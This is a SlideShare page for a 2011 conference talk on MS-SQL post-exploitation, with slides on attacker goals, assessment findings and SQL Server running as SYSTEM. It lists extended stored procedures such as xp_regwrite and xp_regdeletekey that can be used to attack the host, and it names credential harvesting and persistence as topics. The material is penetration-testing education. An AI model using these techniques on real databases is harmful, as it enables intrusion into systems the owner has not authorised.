SlideShare a Scribd company logo

Everything you should already know about MS-SQL post-exploitation

Download as PPTX, PDF
Source Conference
Source Conference

SOURCE Seattle 2011 - Rob Beck

Technology
1 of 28
ATTACK RESEARCH ADVANCED COMPUTER SECURITY RESEARCH & CONSULTING
MS-SQL Post Exploitation: Everything you should already know. Presented By: Rob Beck
Name: Rob Beck (whitey) Title: Director of Assessment Contact: rob.beck@attackresearch.com Background: Career pen-tester (MS/@stake/Honeywell/AR) Security hobbyist and researcher Slacker All About Me 1 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
What Is SQL Post-Exploitation? The steps taken by an attacker following successful SQL access or command execution. Motivation or purpose Level of access achieved Amount of stealth required Persistence 2 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
Why MS-SQL Post Exploitation? Most pen-test resources lack details The explanations given are limited Extended functionality not covered Lots of don’ts without reason in hardening docs People still aren’t using this stuff or get stuck Apparently it was interesting enough for you 3 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
Nothing covered in this presentation is new Everything presented is actively being used Everything presented can be prevented This talk assumes you have SQL access MS-SQL is a subject of interest, not expertise The subject is databases, which is boring Pro-tip: You might be bored 4 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
What’s Covered Utilizing SQL procedures to attack the host Lesser known evils (some don’ts explained) Credential harvesting scenario Potential for using the DB in attacks Persistence tricks 5 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
If you have DBO/sa you win! (There’s more to it) Owning the host or just the DB Persistence If you don’t have DBO/sa it could be research time Stored procedures Extended stored procedures Assemblies Good old fashioned exploits Sometimes it’s just about the data I Have Access Now What? 6 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
What’s Really Important Getting xp_cmdshell() – Do you need it? Adding accounts - Not too stealthy Total capabilities in the SQL instance Blind injection: not always so blind Network access to/from SQL instance Validity of SQL credentials elsewhere Things to Consider 7 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
Lessons Learned Over the past year: 30 assessments 20 of them were successful due to SQL 0 of them detected anything wrong All of them neglected to restrict access 3 of them had blank sa account instances Only 5 of them had plans to upgrade to SQL 2k8 Development environments were always BAD 8 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
Large numbers of organizations are still running SQL as NT AUTHORITYYSTEM If it’s not local system, it’s most likely still admin If it’s a domain account Used elsewhere Still likely to be system admin Of the small percentage who aren’t local system or admin Few if any additional hardening steps are being taken Shared accounts on hosts that were using privileged accounts People Are Still Running SQL As System 9 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
A majority of SQL instances that exist are legacy and will be for some time Everything is vanilla Shared accounts are a certainty Logging is performed, but never observed Lack of access is usually a by-product Reality 10 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
People are lazy Nobody has the resources The people who make the rules Good enough is better than best Why Are Things Broken 11 Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
Extended Stored Procedures - The Hidden Usage The other fun extended stored procedures: ,[object Object]
xp_enumdsn
xp_enumerrorlogs
xp_enumgroups
xp_fileexist*
xp_fixeddrives
xp_getnetname
xp_subdirs*
xp_regdeletekey
xp_regdeletevalue
xp_regread
xp_regwritexp_dirtree xp_enumdsn xp_enumerrorlogs xp_enumgroups xp_fileexist xp_fixeddrives ,[object Object]
xp_subdirs
xp_regdeletekey
xp_regdeletevalue

Recommended

Web & Wireless Hacking
Web & Wireless HackingWeb & Wireless Hacking
Web & Wireless HackingDon Anto
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
Threat Modeling: Best Practices
Threat Modeling: Best PracticesThreat Modeling: Best Practices
Threat Modeling: Best PracticesSource Conference
 
7 Steps to Threat Modeling
7 Steps to Threat Modeling7 Steps to Threat Modeling
7 Steps to Threat ModelingDanny Wong
 
STRIDE And DREAD
STRIDE And DREADSTRIDE And DREAD
STRIDE And DREADchuckbt
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsYulian Slobodyan
 

Recommended

Web & Wireless Hacking
Web & Wireless HackingWeb & Wireless Hacking
Web & Wireless HackingDon Anto
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
Threat Modeling: Best Practices
Threat Modeling: Best PracticesThreat Modeling: Best Practices
Threat Modeling: Best PracticesSource Conference
 
7 Steps to Threat Modeling
7 Steps to Threat Modeling7 Steps to Threat Modeling
7 Steps to Threat ModelingDanny Wong
 
STRIDE And DREAD
STRIDE And DREADSTRIDE And DREAD
STRIDE And DREADchuckbt
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsYulian Slobodyan
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case studyAntonio Fontes
 
Threat Modeling And Analysis
Threat Modeling And AnalysisThreat Modeling And Analysis
Threat Modeling And AnalysisLalit Kale
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleNCC Group
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat ModelingMarco Morana
 
The Internet of Things: Privacy and Security Issues
The Internet of Things: Privacy and Security IssuesThe Internet of Things: Privacy and Security Issues
The Internet of Things: Privacy and Security IssuesEuropean Union Agency for Network and Information Security (ENISA)
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsEric Vétillard
 
Security in the Internet of Things
Security in the Internet of ThingsSecurity in the Internet of Things
Security in the Internet of ThingsForgeRock
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Internet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesInternet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesPierluigi Paganini
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptCNSHacking
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptLokeshK66
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
Dr3150012012202 1.getting started
Dr3150012012202 1.getting startedDr3150012012202 1.getting started
Dr3150012012202 1.getting startedNamgu Jeong
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Sql security
Sql securitySql security
Sql securitySafwan Hashmi
 
Securing MySQL with a Focus on SSL
Securing MySQL with a Focus on SSLSecuring MySQL with a Focus on SSL
Securing MySQL with a Focus on SSLwolfSSL
 
MySQL server security
MySQL server securityMySQL server security
MySQL server securityDamien Seguy
 
Dear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality CheckDear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality CheckPaula Januszkiewicz
 
Linux questions
Linux questionsLinux questions
Linux questions1gman68
 
Connecting to my sql using PHP
Connecting to my sql using PHPConnecting to my sql using PHP
Connecting to my sql using PHPNisa Soomro
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?Gavin Holt
 

More Related Content

Viewers also liked

Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case studyAntonio Fontes
 
Threat Modeling And Analysis
Threat Modeling And AnalysisThreat Modeling And Analysis
Threat Modeling And AnalysisLalit Kale
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleNCC Group
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat ModelingMarco Morana
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsEric Vétillard
 
Security in the Internet of Things
Security in the Internet of ThingsSecurity in the Internet of Things
Security in the Internet of ThingsForgeRock
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Internet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesInternet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesPierluigi Paganini
 

Viewers also liked (9)

Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
 
Threat Modeling And Analysis
Threat Modeling And AnalysisThreat Modeling And Analysis
Threat Modeling And Analysis
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By Example
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
 
The Internet of Things: Privacy and Security Issues
The Internet of Things: Privacy and Security IssuesThe Internet of Things: Privacy and Security Issues
The Internet of Things: Privacy and Security Issues
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of Things
 
Security in the Internet of Things
Security in the Internet of ThingsSecurity in the Internet of Things
Security in the Internet of Things
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Internet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesInternet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issues
 

Similar to Everything you should already know about MS-SQL post-exploitation

SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptCNSHacking
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptLokeshK66
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
Dr3150012012202 1.getting started
Dr3150012012202 1.getting startedDr3150012012202 1.getting started
Dr3150012012202 1.getting startedNamgu Jeong
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Securing MySQL with a Focus on SSL
Securing MySQL with a Focus on SSLSecuring MySQL with a Focus on SSL
Securing MySQL with a Focus on SSLwolfSSL
 
MySQL server security
MySQL server securityMySQL server security
MySQL server securityDamien Seguy
 
Dear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality CheckDear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality CheckPaula Januszkiewicz
 
Linux questions
Linux questionsLinux questions
Linux questions1gman68
 
Connecting to my sql using PHP
Connecting to my sql using PHPConnecting to my sql using PHP
Connecting to my sql using PHPNisa Soomro
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?Gavin Holt
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
Always encrypted overview
Always encrypted overviewAlways encrypted overview
Always encrypted overviewSolidQ
 
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQLNoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQLDATAVERSITY
 

Similar to Everything you should already know about MS-SQL post-exploitation (20)

SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
Dr3150012012202 1.getting started
Dr3150012012202 1.getting startedDr3150012012202 1.getting started
Dr3150012012202 1.getting started
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
Sql security
Sql securitySql security
Sql security
 
Securing MySQL with a Focus on SSL
Securing MySQL with a Focus on SSLSecuring MySQL with a Focus on SSL
Securing MySQL with a Focus on SSL
 
MySQL server security
MySQL server securityMySQL server security
MySQL server security
 
Dear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality CheckDear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality Check
 
Linux questions
Linux questionsLinux questions
Linux questions
 
Connecting to my sql using PHP
Connecting to my sql using PHPConnecting to my sql using PHP
Connecting to my sql using PHP
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
Fortress SQL Server
Fortress SQL ServerFortress SQL Server
Fortress SQL Server
 
Hardening Database Server
Hardening Database ServerHardening Database Server
Hardening Database Server
 
Always encrypted overview
Always encrypted overviewAlways encrypted overview
Always encrypted overview
 
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQLNoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
 
ISSA Siem Fraud
ISSA Siem FraudISSA Siem Fraud
ISSA Siem Fraud
 
Database security2 adebiaye
Database security2 adebiayeDatabase security2 adebiaye
Database security2 adebiaye
 

More from Source Conference

iBanking - a botnet on Android
iBanking - a botnet on AndroidiBanking - a botnet on Android
iBanking - a botnet on AndroidSource Conference
 
I want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUICI want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUICSource Conference
 
From DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and BobsFrom DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and BobsSource Conference
 
Extracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus DerivativesExtracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus DerivativesSource Conference
 
How to Like Social Media Network Security
How to Like Social Media Network SecurityHow to Like Social Media Network Security
How to Like Social Media Network SecuritySource Conference
 
Wfuzz para Penetration Testers
Wfuzz para Penetration TestersWfuzz para Penetration Testers
Wfuzz para Penetration TestersSource Conference
 
Security Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSecurity Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSource Conference
 
Securty Testing For RESTful Applications
Securty Testing For RESTful ApplicationsSecurty Testing For RESTful Applications
Securty Testing For RESTful ApplicationsSource Conference
 
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserMen in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserSource Conference
 
Advanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done ItAdvanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done ItSource Conference
 
Adapting To The Age Of Anonymous
Adapting To The Age Of AnonymousAdapting To The Age Of Anonymous
Adapting To The Age Of AnonymousSource Conference
 
Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?Source Conference
 
Advanced (persistent) binary planting
Advanced (persistent) binary plantingAdvanced (persistent) binary planting
Advanced (persistent) binary plantingSource Conference
 
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to CloudLegal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to CloudSource Conference
 
Who should the security team hire next?
Who should the security team hire next?Who should the security team hire next?
Who should the security team hire next?Source Conference
 
The Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime LawThe Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime LawSource Conference
 
How To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security SpendHow To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security SpendSource Conference
 

More from Source Conference (20)

Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
iBanking - a botnet on Android
iBanking - a botnet on AndroidiBanking - a botnet on Android
iBanking - a botnet on Android
 
I want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUICI want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUIC
 
From DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and BobsFrom DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and Bobs
 
Extracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus DerivativesExtracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus Derivatives
 
How to Like Social Media Network Security
How to Like Social Media Network SecurityHow to Like Social Media Network Security
How to Like Social Media Network Security
 
Wfuzz para Penetration Testers
Wfuzz para Penetration TestersWfuzz para Penetration Testers
Wfuzz para Penetration Testers
 
Security Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSecurity Goodness with Ruby on Rails
Security Goodness with Ruby on Rails
 
Securty Testing For RESTful Applications
Securty Testing For RESTful ApplicationsSecurty Testing For RESTful Applications
Securty Testing For RESTful Applications
 
Esteganografia
EsteganografiaEsteganografia
Esteganografia
 
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserMen in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the Browser
 
Advanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done ItAdvanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done It
 
Adapting To The Age Of Anonymous
Adapting To The Age Of AnonymousAdapting To The Age Of Anonymous
Adapting To The Age Of Anonymous
 
Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?
 
Advanced (persistent) binary planting
Advanced (persistent) binary plantingAdvanced (persistent) binary planting
Advanced (persistent) binary planting
 
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to CloudLegal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
 
Who should the security team hire next?
Who should the security team hire next?Who should the security team hire next?
Who should the security team hire next?
 
The Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime LawThe Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime Law
 
JSF Security
JSF SecurityJSF Security
JSF Security
 
How To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security SpendHow To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security Spend
 

Recently uploaded

Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
